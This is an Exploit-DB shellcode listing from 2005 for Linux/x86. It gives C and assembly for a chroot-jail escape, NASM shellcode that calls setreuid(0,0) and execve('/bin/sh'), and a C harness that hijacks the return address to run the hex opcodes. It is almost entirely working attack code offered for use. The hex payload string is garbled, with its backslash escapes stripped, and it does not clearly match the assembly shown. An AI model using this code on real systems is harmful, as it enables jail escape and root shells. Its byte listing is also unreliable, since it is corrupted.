https://www.exploit-db.com/exploits/13415

漏洞细节尚未披露

/*
 Linux/x86 chroot and standart shellcode.
 By Okti (http://okti.nm.ru)

 ----------------------------------------------------------------------------------------------
*/

 /* Mkdir and Chroot are written in C: */

 #include<stdio.h>
 #include<unistd.h>
 #include<sys/types.h>
 #include<sys/stat.h>
 int main(void) {

        mkdir("sh", 0);
        chown("sh", 0, 0);
        chmod("sh", S_IRUSR | S_IWUSR);
        chroot("sh");
	/* But many '../' as possible, i'm to lazy to add comments ;) */
        chroot("../../../../../../../../../../../../../../../../../../../../../../../../");
 }

 ----------------------------------------------------------------------------------------------

 Asm version of the above C code:

 ----------------------------------------------------------------------------------------------

 	.file	"y.c"
	.section	.rodata
.LC0:
	.string	"sh"
	.align 4
.LC1:
	.string	"../../../../../../../../../../../../../../../../../../../../"
	.text
.globl main
	.type	main, @function
main:
	pushl	%ebp
	movl	%esp, %ebp
	subl	$8, %esp
	andl	$-16, %esp
	movl	$0, %eax
	addl	$15, %eax
	addl	$15, %eax
	shrl	$4, %eax
	sall	$4, %eax
	subl	%eax, %esp
	subl	$8, %esp
	pushl	$0
	pushl	$.LC0
	call	mkdir
	addl	$16, %esp
	subl	$4, %esp
	pushl	$0
	pushl	$0
	pushl	$.LC0
	call	chown
	addl	$16, %esp
	subl	$8, %esp
	pushl	$384
	pushl	$.LC0
	call	chmod
	addl	$16, %esp
	subl	$12, %esp
	pushl	$.LC0
	call	chroot
	addl	$16, %esp
	subl	$12, %esp
	pushl	$.LC1
	call	chroot
	addl	$16, %esp
	leave
	ret
	.size	main, .-main
	.section	.note.GNU-stack,"",@progbits
	.ident	"GCC: (GNU) 3.4.1 (Mandrakelinux 10.1 3.4.1-4mdk)"

 ------------------------------------------------------------------------------------------------

 Standart setreuid and execve shellcode (66 bytes).
 It is all clean and tidy, uses 'pop' and 'push', to get string '/bin/sh' from data segment,
 no null bytes.
 For details, compile this asm code with: nasm -f elf shell.asm then ld shell.o and ./a.out

 ------------------------------------------------------------------------------------------------

  section .data

  db '/bin/sh'
  global _start

  _start:

 ; setruid(uid_t ruid, uid_t euid)

  xor eax, eax
  mov al, 70
  xor ebx, ebx
  xor ecx, ecx
  int 0x80

 jmp two
 one:
  pop ebx

 ; execve(const char *filename, char *const argv[], char *const envp[])

  xor eax, eax
  mov [ebx+7], al
  mov [ebx+8], ebx
  mov [ebx+12], eax
  mov al, 11
  lea ecx, [ebx+8]
  lea edx, [ebx+12]
  int 0x80

  two:
  call one
  db '/bin/sh'

 ---------------------------------------------------------------------------------------------------

 Hex opcodes of the mkdir chroot and above shellcode asm instructions (in C).

 ---------------------------------------------------------------------------------------------------

 #include<stdio.h>
 #include<stdlib.h>
 int main() {

        int *ret;
        long offset = 4;
        char star[] =
        "x89xdax8bx4cx24x08x8bx5cx24x04xb8x27x00x00x00xcdx80"
        "x89xdax8bx5cx24x04xb8x3dx00x00x00xcdx80"
        "x2fx62x69x6ex2fx73x68x31xc0xb0x46x31xdbx31xc9xcd"
        "x80xe9x16x00x00x00x5bx31xc0x88x43x07x89x58x08x89"
        "x43x0cxb0x0bx8dx4bx08x8dx53x0cxcdx80xe8xe5xffxff"
        "xffx2fx62x69x6ex2fx73x68";

        *((int * ) &ret + offset) = (int) star;
 }


// milw0rm.com [2005-07-11]